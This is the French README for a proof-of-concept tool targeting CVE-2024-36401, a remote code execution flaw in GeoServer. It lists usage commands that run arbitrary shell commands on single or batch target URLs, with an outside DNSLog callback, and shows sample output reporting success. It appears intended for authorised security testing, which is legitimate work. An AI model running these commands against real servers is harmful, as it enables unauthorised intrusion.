
Ce script est un outil de détection de type PoC (Proof of Concept) développé pour la vulnérabilité d'exécution de code à distance (CVE-2024-36401) dans GeoServer. Cette vulnérabilité permet à un attaquant d'exécuter des commandes arbitraires sur le serveur cible en construisant des requêtes spécifiques.
⚠️ Avertissement : Cet outil est destiné uniquement à la recherche en sécurité et aux tests autorisés légalement. Ne l'utilisez pas à des fins illégales. L'utilisateur assume l'entière responsabilité juridique.
Version du README : [English | 中文]
Ce script est un outil de détection PoC (Proof of Concept) développé pour la vulnérabilité d'exécution de code à distance (CVE-2024-36401) dans GeoServer. Cette vulnérabilité permet à un attaquant d'exécuter des commandes arbitraires sur le serveur cible en construisant des requêtes spécifiques.
Assurez-vous que votre environnement d'exécution dispose des dépendances suivantes :
requestslxmlVous pouvez installer les dépendances nécessaires avec la commande suivante :
pip install requests lxml
python poc.py -u http://target.com -d dnslog.example.com
Ou spécifiez la commande à exécuter :
python poc.py -u http://target.com -c "touch /tmp/vulntest"
Préparez un fichier texte contenant plusieurs URL cibles (une par ligne) :
python poc.py -uf targets.txt -d dnslog.example.com
Ou spécifiez une commande :
python poc.py -uf targets.txt -c "id"
Instructions d'utilisation détaillées : Document d'utilisation détaillée
⚠️ Remarque : les paramètres
-det-cne peuvent pas être utilisés simultanément.
[INFO] 爬取到3个有效的 Typenames,开始漏洞探测
[INFO] 目标: http://example.com
[INFO] 执行命令: whoami
[INFO] DNSLOG地址:
[INFO] 正在尝试 typeName: topp:states -> whoami
[+] 命令疑似成功执行!目标: http://example.com 命令: whoami
-c./geoserver/wfs.Les contributions sous forme d'Issues ou de Pull Requests sont les bienvenues pour améliorer ce projet.
Ce projet est sous licence MIT. Vous pouvez librement le modifier, le distribuer et l'utiliser commercialement, à condition de conserver l'avis de droit d'auteur.
| Paramètre | Description |
|---|
-u, --url | Adresse de la cible unique |
-uf, --url-file | Chemin du fichier contenant plusieurs URL cibles |
-d, --dnslog | Adresse DNSLog |
-c, --command | Commande à exécuter sur le système cible (ex : whoami, id, curl) |